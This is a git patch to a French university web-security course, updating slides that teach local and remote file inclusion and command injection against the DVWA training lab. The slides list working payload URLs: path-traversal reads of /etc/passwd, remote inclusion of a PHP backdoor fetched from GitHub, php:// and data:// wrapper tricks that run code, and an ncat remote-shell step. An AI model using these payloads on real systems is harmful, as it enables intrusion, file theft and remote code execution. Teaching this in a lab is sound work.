From cadbb482f59c4af4b222f87d3b20495b70fe1867 Mon Sep 17 00:00:00 2001 From: Vincent Mazenod <vmazenod@gmail.com> Date: Thu, 7 Sep 2023 20:39:35 +0200 Subject: [PATCH] dv.wa url --- TODOS.md | 6 ----- content/Etudiants/zz2-f5-websec.md | 18 +++++++-------- content/slides/1337/md/cmdi.md | 2 +- content/slides/1337/md/fi.md | 36 +++++++++++++----------------- 4 files changed, 26 insertions(+), 36 deletions(-) delete mode 100644 TODOS.md diff --git a/TODOS.md b/TODOS.md deleted file mode 100644 index ea51f86..0000000 --- a/TODOS.md +++ /dev/null @@ -1,6 +0,0 @@ -- accepter tous les ssh -- debian11 / 172 -- mettre le contenu de https://perso.limos.fr/mazenod/slides/1337/exploits dans kali http://kali/exploits (faire un zip sur le serveur) - -- bookmark http://dv.wa -- mettre burpsuite en raccourci \ No newline at end of file diff --git a/content/Etudiants/zz2-f5-websec.md b/content/Etudiants/zz2-f5-websec.md index 9b333e5..b7e4f17 100644 --- a/content/Etudiants/zz2-f5-websec.md +++ b/content/Etudiants/zz2-f5-websec.md @@ -236,20 +236,20 @@ Tags: cours * C'est sur cette VM que nous allons tester toutes nos attaques * Vous pouvez aussi suivre les cours une dvwa déployé sur votre [VM perso](https://doc.isima.fr/pedagogie/vm/) * **l'installation de DVWA** sur votre [VM perso](https://doc.isima.fr/pedagogie/vm/) fait partie de l'évaluation (c.f. section [Evaluation / Installer DVWA sur sa VM perso (2 points)](#installer-dvwa-sur-sa-vm-perso-2-points)) - * nom d'utilisateur: student - * mot de passe: student + * nom d'utilisateur: kali + * mot de passe: kali * **debian** héberge la vulnérabilité drupalgeddon présentée en fin de cycle de cours - * nom d'utilisateur: student - * mot de passe: student + * nom d'utilisateur: kali + * mot de passe: kali * **proxy** héberge la vulnérabilité heratbleed présenté en début de cours - * nom d'utilisateur: student - * mot de passe: student + * nom d'utilisateur: kali + * mot de passe: kali * **debian11** est une fresh install de debian 11, qui vous permettra de suivre le déploiement de DVWA en cas de [VM perso](https://doc.isima.fr/pedagogie/vm/) indisponible - * nom d'utilisateur: student - * mot de passe: student + * nom d'utilisateur: kali + * mot de passe: kali Vous trouverez ci après comment redéployer tout cela sur n'importe quelle machine @@ -399,7 +399,7 @@ Ce bug est dû à la numérotation fantaisiste d'Ubuntu des interfaces réseau . # dvwa 172.16.76.146 dvwa dvwa.com dv.wa -# dvwa +# debian11 172.16.76.147 debian11 # host diff --git a/content/slides/1337/md/cmdi.md b/content/slides/1337/md/cmdi.md index e0c3717..72c7c67 100644 --- a/content/slides/1337/md/cmdi.md +++ b/content/slides/1337/md/cmdi.md @@ -131,7 +131,7 @@ sudo apt install ncat * puis sur le terminal de l'attaquant ```shell -ncat -v vm-etu-vimazeno.local.isima.fr 8080 +ncat -v dv.wa 8080 ``` * \o/ accès distant à la machine diff --git a/content/slides/1337/md/fi.md b/content/slides/1337/md/fi.md index 6aa87c9..bb446b2 100644 --- a/content/slides/1337/md/fi.md +++ b/content/slides/1337/md/fi.md @@ -2,10 +2,6 @@ ## aka LFI / RFI -<i class="fa-brands fa-firefox-browser"></i> / <i class="fa-solid fa-desktop"></i> -<br /><br /><br /><br /><br /><br /> -<small> tapez `<prez>.html?<username-uca>` dans votre navigateur pour suivre le cours avec votre nom de vm</small> - ### <i class="fas fa-cogs"></i> File Inclusion @@ -33,7 +29,7 @@ include($_REQUEST['filename']); * souvent appelé **Directory traversal** * permet d'accéder à des fichiers sensibles - * [/?page=/etc/passwd](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=/etc/passwd) + * [/?page=/etc/passwd](http://dv.wa/vulnerabilities/fi/?page=/etc/passwd) * marche aussi avec `/etc/hosts`, `~/.bashrc`, `~/.bash_history` ... * marche pas avec `/etc/shadow` @@ -50,7 +46,7 @@ Note: * paths absolus / paths relatifs (../.. ou ..\\..) * linux `/etc/passwd`, `../../../../../etc/hosts` * windows `c:\boot.ini`, `c:\windows`, `c:\windows\system32\drivers\etc\hosts` -* [/?page=index.php](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=index.php) +* [/?page=index.php](http://dv.wa/vulnerabilities/fi/?page=index.php) * boucle infinie = ca marche * invalider par (include|require)_once @@ -73,11 +69,11 @@ allow_url_include=On # just for test purpose ### <i class="fa-solid fa-bomb"></i> RFI / low -* <small>[/?page=http://perdu.com](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=http://perdu.com)</small> +* <small>[/?page=http://perdu.com](http://dv.wa/vulnerabilities/fi/?page=http://perdu.com)</small> * <i class="fas fa-poop"></i> drôle mais pas très utile * <small>[https://perso.limos.fr/mazenod/slides/1337/exploits/_server.php](https://perso.limos.fr/mazenod/slides/1337/exploits/_server.php)</small> - * <small>[/?page=https://perso.limos.fr/mazenod/slides/1337/exploits/_server.php](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=https://perso.limos.fr/mazenod/slides/1337/exploits/_server.php)</small> + * <small>[/?page=https://perso.limos.fr/mazenod/slides/1337/exploits/_server.php](http://dv.wa/vulnerabilities/fi/?page=https://perso.limos.fr/mazenod/slides/1337/exploits/_server.php)</small> * <i class="fa-solid fa-poo"></i> un peu frustrant @@ -95,11 +91,11 @@ allow_url_include=On # just for test purpose ### <i class="fa-solid fa-bomb"></i> RFI / payloads / backdoor -* <small>[/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php) <i class="fa-solid fa-thumbs-up"></i></small> +* <small>[/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php](http://dv.wa/vulnerabilities/fi/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php) <i class="fa-solid fa-thumbs-up"></i></small> -* <small>[/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php?c=ls](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php?c=ls) <i class="fa-solid fa-thumbs-down"></i></small> +* <small>[/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php?c=ls](http://dv.wa/vulnerabilities/fi/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php?c=ls) <i class="fa-solid fa-thumbs-down"></i></small> -* <small>[/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php&c=ls](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php&c=ls) <i class="fa-solid fa-thumbs-up"></i></small> +* <small>[/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php&c=ls](http://dv.wa/vulnerabilities/fi/?page=https://raw.githubusercontent.com/dberliner/php-backdoor/master/backdoor.php&c=ls) <i class="fa-solid fa-thumbs-up"></i></small> ## RFI / security medium @@ -113,11 +109,11 @@ allow_url_include=On # just for test purpose ``` <small> -* [/?page=hthttp://tp://www.google.fr](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=hthttp://tp://www.google.fr) +* [/?page=hthttp://tp://www.google.fr](http://dv.wa/vulnerabilities/fi/?page=hthttp://tp://www.google.fr) * échapper l'échappement -* [/?page=php://filter/convert.base64-encode/resource=file1.php](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=file1.php) +* [/?page=php://filter/convert.base64-encode/resource=file1.php](http://dv.wa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=file1.php) * récupère le code source php du fichier file1.php -* [/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJob3N0bmFtZSIpOyA/Pgo=](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJob3N0bmFtZSIpOyA/Pgo=) +* [/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJob3N0bmFtZSIpOyA/Pgo=](http://dv.wa/vulnerabilities/fi/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJob3N0bmFtZSIpOyA/Pgo=) * exécute `<?php system("hostname"); ?>` </small> @@ -140,11 +136,11 @@ Note: <small> -* [/?page=../../../../../etc/hosts](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=../../../../../etc/hosts) +* [/?page=../../../../../etc/hosts](http://dv.wa/vulnerabilities/fi/?page=../../../../../etc/hosts) * ne fonctionne plus -* [/?page=../..././..././..././..././..././etc/hosts](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=../..././..././..././..././..././etc/hosts) +* [/?page=../..././..././..././..././..././etc/hosts](http://dv.wa/vulnerabilities/fi/?page=../..././..././..././..././..././etc/hosts) * permet d'échapper l'échappement -* [/?page=/etc/passwd](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=../..././..././..././..././..././etc/hosts) +* [/?page=/etc/passwd](http://dv.wa/vulnerabilities/fi/?page=../..././..././..././..././..././etc/hosts) * Les paths absolus fonctionnent toujours </small> @@ -163,11 +159,11 @@ if( !fnmatch( "file*", $file ) && $file != "include.php" ) { <small> * accès au fichier caché - * [/?page=file4.php](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=file4.php) + * [/?page=file4.php](http://dv.wa/vulnerabilities/fi/?page=file4.php) * [wrapper file](https://www.php.net/manual/en/wrappers.file.php) - * [/?page=file:///etc/hosts](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=file:///etc/hosts) + * [/?page=file:///etc/hosts](http://dv.wa/vulnerabilities/fi/?page=file:///etc/hosts) * le dossier file n'existe pas mais php résout tout de même - * [/?page=file/../../../../../../etc/hosts](http://vm-etu-vimazeno.local.isima.fr/vulnerabilities/fi/?page=file/../../../../../../etc/hosts) + * [/?page=file/../../../../../../etc/hosts](http://dv.wa/vulnerabilities/fi/?page=file/../../../../../../etc/hosts) ## <i class="fa fa-medkit"></i> [open_base_dir](http://php.net/manual/fr/ini.core.php#ini.open-basedir) -- GitLab